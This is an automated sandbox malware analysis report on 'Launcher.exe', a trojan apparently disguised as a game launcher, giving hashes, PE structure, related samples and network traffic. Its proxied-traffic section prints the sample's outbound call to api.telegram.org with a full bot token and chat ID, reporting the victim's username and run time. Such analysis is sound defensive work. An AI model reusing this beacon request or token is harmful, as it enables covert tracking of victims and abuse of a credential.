http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com/invite/universecityGhttps://twitter.com/UniverseCityP2E3https://universe-city.io	Launcher.exe	false	Avira URL Cloud: safe	unknown
https://universe-city.io/download/UniverseCity.zip	Launcher.exe	false	Avira URL Cloud: safe	unknown
https://github.com/JulietaUla/Montserrat)Montserrat	Launcher.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	753414
Start date and time:	2022-11-24 19:35:08 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Launcher.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.troj.winEXE@1/0@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 41 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
Execution Graph export aborted for target Launcher.exe, PID 5948 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Link
149.154.167.220	file.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.1617.14844.17732.exe	Get hash	malicious	Browse
	Shipping documents and BL. PDF.exe	Get hash	malicious	Browse
	Purchase Order for Stromag Altra Indstrial Motion 77678GTH78..exe	Get hash	malicious	Browse
	UAB VISI ATSAKYMAI30000290161120220112162613..js	Get hash	malicious	Browse
	1919.exe	Get hash	malicious	Browse
	SecuriteInfo.com.FileRepMalware.27148.7504.exe	Get hash	malicious	Browse
	NRJHM5PF.EXE.exe	Get hash	malicious	Browse
	Halkbank.exe	Get hash	malicious	Browse
	Ziraat-bankasiSwiftMessaji000017.exe	Get hash	malicious	Browse
	DHL Express Receipt_12244811733.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Heuristic.HEUR.AGEN.1253469.14711.357.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.28561.26060.exe	Get hash	malicious	Browse
	IMG_20220230113-9083.vbs	Get hash	malicious	Browse
	dhcCoVw2i7.exe	Get hash	malicious	Browse
	CWMUquaFJP.exe	Get hash	malicious	Browse
	datos bancarios pdf.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.MSIL_Kryptik.IKV.gen.Eldorado.9882.9320.exe	Get hash	malicious	Browse
	BL-SHIPPING DOCUMENTS.exe	Get hash	malicious	Browse
	ZJsf2OkhUG.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.telegram.org	file.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.1617.14844.17732.exe	Get hash	malicious	Browse	149.154.167.220
	Shipping documents and BL. PDF.exe	Get hash	malicious	Browse	149.154.167.220
	Purchase Order for Stromag Altra Indstrial Motion 77678GTH78..exe	Get hash	malicious	Browse	149.154.167.220
	UAB VISI ATSAKYMAI30000290161120220112162613..js	Get hash	malicious	Browse	149.154.167.220
	1919.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.FileRepMalware.27148.7504.exe	Get hash	malicious	Browse	149.154.167.220
	NRJHM5PF.EXE.exe	Get hash	malicious	Browse	149.154.167.220
	Halkbank.exe	Get hash	malicious	Browse	149.154.167.220
	Ziraat-bankasiSwiftMessaji000017.exe	Get hash	malicious	Browse	149.154.167.220
	DHL Express Receipt_12244811733.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Heuristic.HEUR.AGEN.1253469.14711.357.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.28561.26060.exe	Get hash	malicious	Browse	149.154.167.220
	IMG_20220230113-9083.vbs	Get hash	malicious	Browse	149.154.167.220
	dhcCoVw2i7.exe	Get hash	malicious	Browse	149.154.167.220
	CWMUquaFJP.exe	Get hash	malicious	Browse	149.154.167.220
	datos bancarios pdf.exe	Get hash	malicious	Browse	149.154.167.220
	po.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.MSIL_Kryptik.IKV.gen.Eldorado.9882.9320.exe	Get hash	malicious	Browse	149.154.167.220
	BL-SHIPPING DOCUMENTS.exe	Get hash	malicious	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.220
	c02_.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.PackedNET.1617.14844.17732.exe	Get hash	malicious	Browse	149.154.167.220
	60724da01de35adee6cb34317cd2947fbcb791a838138.exe	Get hash	malicious	Browse	149.154.167.99
	d7c42d1df0e957935b672b0633cf3dad39b5d8c85eec4.exe	Get hash	malicious	Browse	149.154.167.99
	Shipping documents and BL. PDF.exe	Get hash	malicious	Browse	149.154.167.220
	d7c42d1df0e957935b672b0633cf3dad39b5d8c85eec4.exe	Get hash	malicious	Browse	149.154.167.99
	Purchase Order for Stromag Altra Indstrial Motion 77678GTH78..exe	Get hash	malicious	Browse	149.154.167.220
	qsu3KRECRS.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	MIJZnILMm8.exe	Get hash	malicious	Browse	149.154.167.99
	UAB VISI ATSAKYMAI30000290161120220112162613..js	Get hash	malicious	Browse	149.154.167.220
	1919.exe	Get hash	malicious	Browse	149.154.167.220
	Setup.exe	Get hash	malicious	Browse	149.154.167.99
	9e823478f8b4cc0fea25c68e63e9ae85f2274a419dc6c.exe	Get hash	malicious	Browse	149.154.167.99
	98b6099d16a25e58b52000dc4fba65cf696262e6bbe85.exe	Get hash	malicious	Browse	149.154.167.99
	48bc23c628e7dbec916fbe213d1c19336ebab4f868d08.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.FileRepMalware.27148.7504.exe	Get hash	malicious	Browse	149.154.167.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.220
	PO#RFQ-HL51L07.exe	Get hash	malicious	Browse	149.154.167.220
	P.Order Wrapping sheets.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.1617.14844.17732.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.220
	6iWK0k820U.exe	Get hash	malicious	Browse	149.154.167.220
	Shipping documents and BL. PDF.exe	Get hash	malicious	Browse	149.154.167.220
	Purchase Order for Stromag Altra Indstrial Motion 77678GTH78..exe	Get hash	malicious	Browse	149.154.167.220
	qsu3KRECRS.exe	Get hash	malicious	Browse	149.154.167.220
	UAB VISI ATSAKYMAI30000290161120220112162613..js	Get hash	malicious	Browse	149.154.167.220
	Shipping documents.exe	Get hash	malicious	Browse	149.154.167.220
	1919.exe	Get hash	malicious	Browse	149.154.167.220
	Q-105038 MR-47237 EL HOSS.exe	Get hash	malicious	Browse	149.154.167.220
	PI updated bank details pdf.exe	Get hash	malicious	Browse	149.154.167.220
	rA1SyRXvg3.exe	Get hash	malicious	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.188130461543658
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Launcher.exe
File size:	1126912
MD5:	ac30d9ee77f4a6e23dea621727579dc5
SHA1:	9dc851e691a4af49882138ee7c5bac1dc126becd
SHA256:	d8f1870f30298302fce860d7c56257f6a11e4689642c3d5367d2392db5356bed
SHA512:	13d6e128462b4d604287333ba50eeeedba1fc0c09c548ad9d502d42b2c6a7c2ccbc8b71b960f1dd4fc98bde28fb74999f297de75ff98b6b9c5bb58c44f58f052
SSDEEP:	24576:0Nv4W8QJdOLP1Sa/wTCZnxf7ujAfcRfNv4Wo:5eOLP1Sa/ICZnx6UfcRC
TLSH:	9135CF07FB53BA5BC6210B3696F5CE955336AA302A7E63879C4B62389C833F54D132D4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..(..........VG... ...`....@.. ....................................`................................

File Icon


Icon Hash:	d2ad9793938eacf2

Static PE Info

General

Entrypoint:	0x4f4756
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xAAC8B1A6 [Sun Oct 17 22:56:38 2060 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf4703	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf6000	0x2059c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x19315600	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x118000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xf4670	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xf275c	0xf2800	False	0.6635842864046392	data	7.109491085129885	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xf6000	0x2059c	0x20600	False	0.8671196307915058	data	7.635069013125214	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x118000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xf61a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0xf6618	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0xf6fb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0xf8068	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0xfa620	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0
RT_ICON	0xfe858	0x1683e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x1150a8	0x5a	data
RT_VERSION	0x115114	0x354	data
RT_MANIFEST	0x115478	0x111f	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2022 19:36:00.976207972 CET	49702	443	192.168.2.3	149.154.167.220
Nov 24, 2022 19:36:00.976288080 CET	443	49702	149.154.167.220	192.168.2.3
Nov 24, 2022 19:36:00.976560116 CET	49702	443	192.168.2.3	149.154.167.220
Nov 24, 2022 19:36:01.015506983 CET	49702	443	192.168.2.3	149.154.167.220
Nov 24, 2022 19:36:01.015575886 CET	443	49702	149.154.167.220	192.168.2.3
Nov 24, 2022 19:36:01.096575975 CET	443	49702	149.154.167.220	192.168.2.3
Nov 24, 2022 19:36:01.096771002 CET	49702	443	192.168.2.3	149.154.167.220
Nov 24, 2022 19:36:01.104090929 CET	49702	443	192.168.2.3	149.154.167.220
Nov 24, 2022 19:36:01.104135036 CET	443	49702	149.154.167.220	192.168.2.3
Nov 24, 2022 19:36:01.104583025 CET	443	49702	149.154.167.220	192.168.2.3
Nov 24, 2022 19:36:01.146436930 CET	49702	443	192.168.2.3	149.154.167.220
Nov 24, 2022 19:36:01.409517050 CET	49702	443	192.168.2.3	149.154.167.220
Nov 24, 2022 19:36:01.409578085 CET	443	49702	149.154.167.220	192.168.2.3
Nov 24, 2022 19:36:01.632040024 CET	443	49702	149.154.167.220	192.168.2.3
Nov 24, 2022 19:36:01.632178068 CET	443	49702	149.154.167.220	192.168.2.3
Nov 24, 2022 19:36:01.632385969 CET	49702	443	192.168.2.3	149.154.167.220
Nov 24, 2022 19:36:01.636691093 CET	49702	443	192.168.2.3	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2022 19:36:00.932370901 CET	49977	53	192.168.2.3	8.8.8.8
Nov 24, 2022 19:36:00.951380968 CET	53	49977	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 24, 2022 19:36:00.932370901 CET	192.168.2.3	8.8.8.8	0x1abf	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 24, 2022 19:36:00.951380968 CET	8.8.8.8	192.168.2.3	0x1abf	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49702	149.154.167.220	443	C:\Users\user\Desktop\Launcher.exe

Timestamp	Direction	Data
2022-11-24 18:36:01 UTC	OUT	GET /bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001729137879&text=5.0%20NEW%2020.11.2022%0A%E2%9C%85%D0%A3%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D1%8B%D0%B9%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%20%D0%BB%D0%B0%D1%83%D0%BD%D1%87%D0%B5%D1%80%D0%B0:%20user%0A%D0%A1%D0%B0%D0%B9%D1%82:%20universecity%0A%D0%94%D0%B0%D1%82%D0%B0%2011/24/2022%207:35:59%20PM&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2022-11-24 18:36:01 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 24 Nov 2022 18:36:01 GMT Content-Type: application/json Content-Length: 602 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2022-11-24 18:36:01 UTC	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 32 33 31 2c 22 73 65 6e 64 65 72 5f 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 31 37 32 39 31 33 37 38 37 39 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 34 32 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 34 33 5c 75 30 34 33 61 20 5c 75 30 34 31 62 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 64 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 31 37 32 39 31 33 37 38 37 39 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 34 32 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 34 33 5c 75 30 34 33 61 Data Ascii: {"ok":true,"result":{"message_id":6231,"sender_chat":{"id":-1001729137879,"title":"\u041e\u0442\u0441\u0442\u0443\u043a \u041b\u0430\u0443\u043d\u0447\u0435\u0440","type":"channel"},"chat":{"id":-1001729137879,"title":"\u041e\u0442\u0441\u0442\u0443\u043a

Target ID:	0
Start time:	19:35:58
Start date:	24/11/2022
Path:	C:\Users\user\Desktop\Launcher.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Launcher.exe
Imagebase:	0x610000
File size:	1126912 bytes
MD5 hash:	AC30D9EE77F4A6E23DEA621727579DC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Function 010F2FB1 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57d6a62d9ebc68bcb2be861b5d0b7fe811ab0a14c30969474d24b7d62dfd087e
Instruction ID: 35d4cdeeca295ad63958f31bff63989e3e05a343ae7706ed748cac7d1ccc8e7c
Opcode Fuzzy Hash: 57d6a62d9ebc68bcb2be861b5d0b7fe811ab0a14c30969474d24b7d62dfd087e
Instruction Fuzzy Hash: 09810C382582078FE748FF60F495C893766EB84315B11DE25DA029B6ACEF786D47CB80

Uniqueness

Uniqueness Score: -1.00%

Function 010F2FC0 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c6d66cd2ceb6d8ffdcc882eedc3bf746d4d55729eda2d6526e6199235b26066
Instruction ID: dff17a9b85c51ca0aeae10fdf6ceb50bb648670444774ee8cdb7692db6f8bd88
Opcode Fuzzy Hash: 1c6d66cd2ceb6d8ffdcc882eedc3bf746d4d55729eda2d6526e6199235b26066
Instruction Fuzzy Hash: E381FB382582078FE748FF60F495C893766EB84319711DE25DA029B66CEF786D47CB80

Uniqueness

Uniqueness Score: -1.00%

Function 010F1540 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8def24c901f2614af65b473a2450558fbed14d9d7aa60032bfe03bd1f15f5e67
Instruction ID: 3b4a74e9c5066e936aa8de44a6956de5f314424984ef28aeddf159421d04e29c
Opcode Fuzzy Hash: 8def24c901f2614af65b473a2450558fbed14d9d7aa60032bfe03bd1f15f5e67
Instruction Fuzzy Hash: 34410534B00105DFE7059F65E456AAEBAFAEFC9350F14802DE646EBB90CE358C02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 010F1512 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d242b342cf1ccf28c0f0bc9503cd027c328e88207b033e61471f37357abaf5
Instruction ID: 829b86a9866aad034e14961b9c7ba3f5edcdfe086c61f48e85c193c234a55fdd
Opcode Fuzzy Hash: 81d242b342cf1ccf28c0f0bc9503cd027c328e88207b033e61471f37357abaf5
Instruction Fuzzy Hash: A831F4319043488FCB11CFA9D8857DEBFF4FF49220F0484AAD695E7651D738A444CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0101E01C Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504336783.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_101d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1777198c25c89a13feb7fa03a637e54fc24aabe86034d8cbef4543ad21018c12
Instruction ID: f6fafd3fbe4de941bc27f65d8a6717c946214a58d089956fefc6862171d7fd83
Opcode Fuzzy Hash: 1777198c25c89a13feb7fa03a637e54fc24aabe86034d8cbef4543ad21018c12
Instruction Fuzzy Hash: 48319172504204EFDF578F54C9C0B1ABFA6FB48314F2485A8FE454A25AC33AD896CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0101EAF0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504336783.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_101d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc9605d2d65fdf3a4c98510a87f8b0463020359bc8df45cd0c3cd8fff7c69fe
Instruction ID: 239964be54d9ded53a0f64503e8c410c1b01c4987ceebddab1e502d476ebf928
Opcode Fuzzy Hash: abc9605d2d65fdf3a4c98510a87f8b0463020359bc8df45cd0c3cd8fff7c69fe
Instruction Fuzzy Hash: 4731D7B2104244EFDF469F54D9C0F5BBFA6FB48324F2485A8ED464A25BC33AD851CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0101E9F4 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504336783.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_101d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00b8c6259df53c7ac28e9c7ed221e8079e734920c5de5142e9e0f482f53ca6d8
Instruction ID: 5a757d2b27ed76d66eac2a5fc44422716c474024c7b600eb33206ea9deb28358
Opcode Fuzzy Hash: 00b8c6259df53c7ac28e9c7ed221e8079e734920c5de5142e9e0f482f53ca6d8
Instruction Fuzzy Hash: 6721D8B2504240EFDF06CF54D9C0B5ABBA5FB88314F24C6A9ED454A24AC33AE856CB61

Uniqueness

Uniqueness Score: -1.00%

Function 010F0B10 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a240a6fd84cacc783de2f832ae7b0cb94d0a224f01bf3e238a234d2baeb54d
Instruction ID: fe4e7fb6886686befbac509099b19945dbd0b5eb059672658fb24f51f46c14da
Opcode Fuzzy Hash: 43a240a6fd84cacc783de2f832ae7b0cb94d0a224f01bf3e238a234d2baeb54d
Instruction Fuzzy Hash: 1621903030421D8BDB19ABA48820BAE7BE7DBCC614F14407ED506A7799DF7A4C528BA1

Uniqueness

Uniqueness Score: -1.00%

Function 010F1A38 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18c98cf7d229786d484f558d57ead473c5095342c9de3eca95683f019fd2ca24
Instruction ID: e9558bb6121a60a3f51f5e320eeb8a5c650cec138ae57ddd8b4f745983bed20b
Opcode Fuzzy Hash: 18c98cf7d229786d484f558d57ead473c5095342c9de3eca95683f019fd2ca24
Instruction Fuzzy Hash: 84219E31629242CBCF0577B0E96F0DD7FAAAFA51013144C7DA282CB6A5DE3D9C42C751

Uniqueness

Uniqueness Score: -1.00%

Function 0100D054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504298684.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
